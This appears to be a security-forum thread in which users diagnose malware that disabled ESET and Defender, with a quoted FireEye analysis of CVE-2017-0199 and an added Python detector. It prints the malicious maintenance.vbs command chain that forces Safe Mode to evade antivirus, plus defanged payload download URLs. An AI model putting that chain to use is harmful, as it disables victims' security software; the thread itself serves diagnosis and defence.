
A new virus?! (Eset + Microsoft defender and Windows updates are gone)



Also, how could this bugger delete ekrn.exe? Per maintenance.vbs script:

strArgs = "%comspec% /C %SystemRoot%\System32\msiexec.exe /i %SystemRoot%\System32\ServiceInstaller.msi /qn & del %SystemRoot%\System32\ServiceInstaller.msi & %SystemRoot%\System32\bcdedit.exe /set {current} safeboot minimal & %SystemRoot%\System32\powercfg.exe /hibernate off & schtasks /Delete /TN ""Microsoft\Windows\Maintenance\InstallWinSAT"" /F"

Note the reference to "safeboot." Eset unfortunately is not functional in Safe mode. The next time the PC was rebooted, it was in Safe mode. At this point, the attacker can do whatever he wishes with regard to disabling security software.

More disturbing, Snatch ransomware also uses the "boot into Safe mode" technique to encrypt files:

Quote

To take advantage of anti-malware solutions not loading in Safe Mode, the Snatch ransomware component installs itself as a Windows service dubbed SuperBackupMan capable of running in Safe Mode that can't be stopped or paused, and then force restarts the compromised machine.

https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/

Edited by itman
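The strArgs chain quoted above is a good detection target on its own. As an added example that is not from the thread or from ESET, the Python below splits a logged cmd.exe command line on "&" and flags each tactic the script chains together (the finding names, the rule set and the sample command lines are my own constructions; the first sample is the strArgs value with the VBScript double-quote escaping undone).

```python
"""Flag the Safe Mode evasion chain from maintenance.vbs in process command lines.
Added example (not from the thread or ESET): rules run over cmd.exe command lines
as an EDR or Sysmon sensor would log them; the sample lines are constructed."""
import re

# Strips a 'cmd /C' or '%comspec% /C' prefix. Caveat: '&' inside quotes is not handled.
_CMD_PREFIX = re.compile(r'^\s*(?:\S*cmd(?:\.exe)?|%comspec%)\s+/[ck]\s+', re.I)

def split_chain(cmdline):
    """Split the chain on '&' / '&&' into per-command token lists."""
    m = _CMD_PREFIX.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    return [p.split() for p in re.split(r'\s*&{1,2}\s*', body) if p.strip()]

# (finding, program, predicate over lower-cased tokens). The first is the thread's point:
# forcing the next boot into Safe Mode, where ESET and most other AV do not load.
RULES = [
    ("safeboot_set",       "bcdedit.exe",  lambda t: "/set" in t and "safeboot" in t),
    ("hibernate_off",      "powercfg.exe", lambda t: "/hibernate" in t and "off" in t),
    ("task_deleted",       "schtasks.exe", lambda t: "/delete" in t),
    ("silent_msi_install", "msiexec.exe",  lambda t: "/i" in t and ("/qn" in t or "/quiet" in t)),
    ("installer_removed",  "del",          lambda t: any(x.endswith(".msi") for x in t)),
]

def classify(cmdline):
    """Findings triggered by each sub-command, in chain order."""
    findings = []
    for tokens in split_chain(cmdline):
        # Lower-cased basename, so %SystemRoot%\System32\bcdedit.exe matches bcdedit.exe.
        exe, low = tokens[0].rsplit("\\", 1)[-1].lower(), [t.lower() for t in tokens]
        for name, prog, pred in RULES:
            if exe in (prog, prog.removesuffix(".exe")) and pred(low):
                findings.append(name)
    return findings

def verdict(cmdline):
    """'critical' if Safe Mode is forced alongside other tampering, 'suspicious' for a
    bare safeboot change (admins do this legitimately), else 'clean'."""
    f = classify(cmdline)
    return ("critical" if len(f) > 1 else "suspicious") if "safeboot_set" in f else "clean"

# Constructed: the strArgs value with the VBScript "" quoting undone.
MAINTENANCE_VBS = (
    r'%comspec% /C %SystemRoot%\System32\msiexec.exe /i %SystemRoot%\System32\ServiceInstaller.msi /qn'
    r' & del %SystemRoot%\System32\ServiceInstaller.msi'
    r' & %SystemRoot%\System32\bcdedit.exe /set {current} safeboot minimal'
    r' & %SystemRoot%\System32\powercfg.exe /hibernate off'
    r' & schtasks /Delete /TN "Microsoft\Windows\Maintenance\InstallWinSAT" /F'
)
# Constructed: the clean-up an admin runs to make the next boot normal again.
LEAVE_SAFEBOOT = r'cmd.exe /C bcdedit /deletevalue {current} safeboot'
```

The same `bcdedit /deletevalue {current} safeboot` in the clean sample is what removes the forced Safe Mode entry once the machine has been cleaned.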

I was able to find an analysis of StartupCheck.vbs at Joe's Cloud Sandbox here: https://www.joesandbox.com/analysis/243006/0/html which they determined to be malicious.

Using the file hash shown, I went to VirusTotal to see if anyone detects it. The result was that no one detects it. At least that is an explanation of why this bugger has been "flying under the AV radar" for so long.


Found one bugger using malicious maintenance.vbs script:

Quote

FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit. FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch by Microsoft to address the vulnerability, which can be found here.

The vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents. FireEye recommends that Microsoft Office users apply the patch from Microsoft.

Winword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe. Mshta.exe then executes the script embedded in the malicious HTA document. Figure 4 shows the deobfuscated VBScript from the first stage download.

The script shown in Figure 4 performs the following malicious actions:

  1. Terminates the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1.
  2. Downloads a VBScript file from http[:]//www.modani[.]com/media/wysiwyg/ww.vbs and saves it to %appdata%\Microsoft\Windows\maintenance.vbs
  3. Downloads a decoy document from http[:]//www.modani[.]com/media/wysiwyg/questions.doc and saves it to %temp%\document.doc
  4. Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally
  5. Executes the malicious stage two VBScript: %appdata%\Microsoft\Windows\maintenance.vbs
  6. Opens the decoy document, %temp%\document.doc, to hide the malicious activity from the user

Once executed, the downloaded stage two VBScript (ww.vbs/maintenance.vbs) performs the following actions:

  1. Writes an embedded obfuscated script to %TMP%/eoobvfwiglhiliqougukgm.js
  2. Executes the script

The obfuscated eoobvfwiglhiliqougukgm.js script performs the following actions when executed:

  1. Attempts to delete itself from the system
  2. Attempts to download http[:]//www.modani[.]com/media/wysiwyg/wood.exe (at most 44 times), and save the file to %TMP%\dcihprianeeyirdeuceulx.exe
  3. Executes %TMP%\dcihprianeeyirdeuceulx.exe


https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

This is one possible way maintenance.vbs landed on the OP's device. Of note, in this case it was in a %AppData% directory.


Edited by itman

On 11/20/2020 at 6:33 PM, itman said:

Hard to say what went on in this device in the week or so since this malware was detected. From MBAM's findings to date, it appears to be coin mining related. But who knows if a backdoor or more malware, spyware, etc. were also installed in the interim?

If it were my device, I would indeed reformat and reinstall Win 10 20H2.

When I had the problem, I made a backup and reinstalled Win10, formatting C:\. First I reinstalled the antivirus and scanned my backup for the first time, and it found malware that it hadn't found before. After a week, the problem occurred again, so I realized that my wife's mobile was infected and it was possibly spreading by wifi. So I had to restore all mobiles and format the PC again. After this the problem was fixed.


11 hours ago, Jondety25 said:

When I had the problem, I made a backup and reinstalled Win10, formatting C:\. First I reinstalled the antivirus and scanned my backup for the first time, and it found malware that it hadn't found before. After a week, the problem occurred again, so I realized that my wife's mobile was infected and it was possibly spreading by wifi. So I had to restore all mobiles and format the PC again. After this the problem was fixed.

Good point.

Repeated infections after a drive reformat and OS installation would most definitely point to a network security issue external to the device being reinfected. The problem is that one has to go through this process to confirm it is the source of the repeated infections.

Additionally, the above is not the only source of residual malware. The malware may be firmware based, residing on a device attached to the PC or on a component of the motherboard. There have also been instances where malware has persisted through a normal drive reformat. This is why it is recommended to perform an industrial grade software based wipe of the hard drive, or to replace the drive entirely if the same malware persists.

Edited by itman

17 hours ago, itman said:

Good point.

Repeated infections after a drive reformat and OS installation would most definitely point to a network security issue external to the device being reinfected. The problem is that one has to go through this process to confirm it is the source of the repeated infections.

Additionally, the above is not the only source of residual malware. The malware may be firmware based, residing on a device attached to the PC or on a component of the motherboard. There have also been instances where malware has persisted through a normal drive reformat. This is why it is recommended to perform an industrial grade software based wipe of the hard drive, or to replace the drive entirely if the same malware persists.

In my case I believe the thing was present in the backup itself, so that is why it kept coming back. Just to be sure I disabled Google sync on my machine and deleted all the extensions and cookies. I keep doing checks with the anti-rootkit tool from MB and I also keep an eye on the Windows\System32 folders, and so far everything seems to be clean.


7 hours ago, ProblemNeedsSolution said:

In my case I believe the thing was present in the backup itself, so that is why it kept coming back. Just to be sure I disabled Google sync on my machine and deleted all the extensions and cookies. I keep doing checks with the anti-rootkit tool from MB and I also keep an eye on the Windows\System32 folders, and so far everything seems to be clean.

It is impossible to determine what the malware did when you started the PC in normal mode and all security protection was disabled.

At a minimum, you should change all your passwords; especially those pertaining to financial web sites. If you used e-mail when all security protection was disabled, your passwords there should be changed.

You should also run a full Eset custom scan at Admin level and see if Eset can find any residual malware.

Edited by itman

On 11/23/2020 at 4:27 PM, itman said:

It is impossible to determine what the malware did when you started the PC in normal mode and all security protection was disabled.

At a minimum, you should change all your passwords; especially those pertaining to financial web sites. If you used e-mail when all security protection was disabled, your passwords there should be changed.

You should also run a full Eset custom scan at Admin level and see if Eset can find any residual malware.

I did checks with Eset at admin level and with MB too, and it has stayed clean since the day of discovery of Maintenance.vbs. They should really work this into an update at Eset so that they could be the first useful AV SW against this :) Anyway, thanks for the help, people; my issue is solved.
